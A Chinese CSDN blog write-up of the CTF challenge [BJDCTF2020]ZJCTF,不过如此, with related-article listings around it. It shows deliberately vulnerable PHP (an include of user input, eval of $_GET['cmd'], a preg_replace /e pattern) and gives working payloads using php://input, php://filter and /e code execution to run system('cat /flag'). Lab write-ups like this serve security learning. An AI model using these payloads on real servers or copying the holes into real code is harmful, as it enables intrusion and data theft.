[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2024-06-17 22:56:29 发布
最新推荐文章于 2024-06-17 22:56:29 发布
阅读量147 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/108826146
版权

打开题目,直接看到代码

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

这里很明显,可以通过文件包含的伪协议来读取文件
要读取一个文件,里面的内容要为"I have a dream",这里可以通过php://input 的伪协议来通过这个判断
file_get_contents($text,'r')==="I have a dream"
接下来通过php://filter读取文件的源代码,但是过滤了对flag文件的读取,不过提示了next.php的存在,因此我们先读取next.php,构造payload
在这里插入图片描述
得到了next.php base64加密之后的字符串,解密之后得到源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

preg_replace()使用的/e模式可以存在远程执行代码
具体文章可以参考 深入研究preg_replace与代码执行
payload1:利用源码给的getFlag函数
/next.php?\S*=${getflag()}&cmd=show_source("/flag")
在这里插入图片描述
payload2:通过构造post传参
next.php?\S*=${eval($_POST[A])}
POST:
A=system("cat /flag");

沫忆末忆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
2022 第五届 浙江省大学生网络与信息安全竞赛技能赛 决赛 Writeup,5题
热门推荐
小哈里的博客
09-24 1万+
将后缀改为.m4a播放一下,感觉是个摩斯电码。用格式工厂转为MP3,丢到AudacityPortable看波形,手抄摩斯电码得到密码码-…-, 解密后得到密码为BA43BCEFC204。打开压缩包,输入上面音频中得到的密码,解压得到atbash加密后的字符串。01Edit打开音频文件,发现末尾有个反向的zip,写代码提取出来。最后跑一遍ROT47+atbash得到flag。
第五届浙江省大学生网络与信息安全竞赛预赛 部分WP
weixin_46356548的博客
09-17 2167
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛 预赛 部分WP
[BJDCTF2020]ZJCTF不过如此1
最新发布
m0_73673698的博客
06-17 1088
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。
浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(php几个协议的运用)
weixin_45844670的博客
09-23 1413
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"
正则表达式语法
艾斯比
09-23 331
. 点号表示任意非换行符 \n 的字符 + 加号表示匹配 1 次或多次, 例如 c+ 表示匹配字母 c 一次或者多次 ? 问号表示匹配 0 次或 1 次 * 星号表示匹配 0 次或多次 [] 中括号表示匹配单个字符, 例如 [am] 表示匹配字母 a 或者 m 对于连续的, 可以使用 [a-z] 表示字母从 a 到 z 的任一字符, 其他还有 [A-Z] 和 [0-9] [] 开头使用 ^ 表示整个取反, 例如 [^abc] 表示匹配非字符 a 非字符 b 非字符 c 的其他字符 () 小括号表示匹.
浙江省首届大学生网络与信息安全竞赛决赛原题解析
jachinFang的博客
07-08 2247
原题2-1 circle圆圈圈圆一张普通的纸 第一步就是将图片下载下来,利用foremost分解图片中的文件 第二步将打开分解出来的word文件,发现一个flag,但是输入的时候发现错误, 第三步发现rar压缩文件需要密码,所以将flag当成密码来解密rar文件 第四步就是将解密的图片用notepad++打开搜索ZJCTF发现 了一个flag 原题4-1 p...
justCTF-2020:justCTF 2020
05-24
《justCTF 2020:HTML技术在网络安全竞赛中的应用探析》 ...同时,通过分析justCTF-2020-master这个压缩包文件,我们可以深入研究比赛的具体挑战,学习并复盘过去的案例,以期在未来类似的竞争中取得更好的成绩。
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
BJDCTF 2nd–TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
EasyMD5
03-09
《EasyMD5:高效便捷的文件MD5校验工具》 在数字信息时代,文件的安全性和完整性至关重要。MD5(Message-Digest Algorithm 5)是一种广泛使用的哈希函数,能够生成一个固定长度的摘要,用于验证文件是否被篡改。...
EasySearch
03-16
Make the search easyly HOW TO INSTALL ============== Please copy the easysearch.jar to your JBuilder lib/ext folder, and re-start JBuilder. ...Exit from JBuilder, and remove easysearch.jar from ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
2019浙江省大学生网络与信息安全竞赛决赛部分WriteUp
CTF小白的博客
12-05 6539
0x01 前言 这次比赛PWN爷爷没有去,去了OPPO的线下赛,所以最后只拿到了前十靠后的名次。不过还是拿到了省一等奖,也算没有留下什么遗憾。 0x02 万能密码 通过名字就可以知道这题考察的是最基本的SQL注入知识点。 通过对题目环境的测试可以发现,这是基于盲注的POST注入,闭合双引号即可,登陆即可拿到flag payload admin"# 0x03 贰零肆捌 题目是一个2048的游戏...
buuctf-不过如此
bin789456的博客
02-02 2047
WP 这个题利用了preg的命令执行,没怎么遇到过,记录一下。 首先代码审计: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."&
BUUCTF web(六)
m0_46616663的博客
11-25 2842
[BJDCTF2020]ZJCTF不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br
2022年浙江省大学生网络与信息安全竞赛-Misc部分(决赛)
weixin_52961098的博客
10-02 748
最终排名:第9还是第8来着,忘了,反正是一等要附件私信吧,不回复 就是回家掰苞米去了。
[bjdctf2020]zjctf不过如此
03-16
[bjdctf202]zjctf不过如此,是一道比赛题目的名称。具体的题目内容和解法我不清楚,因为我只是一个人工智能语言模型,没有参加过这个比赛。不过,如果您有相关的问题或者需要帮助,我会尽力回答和帮助您。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值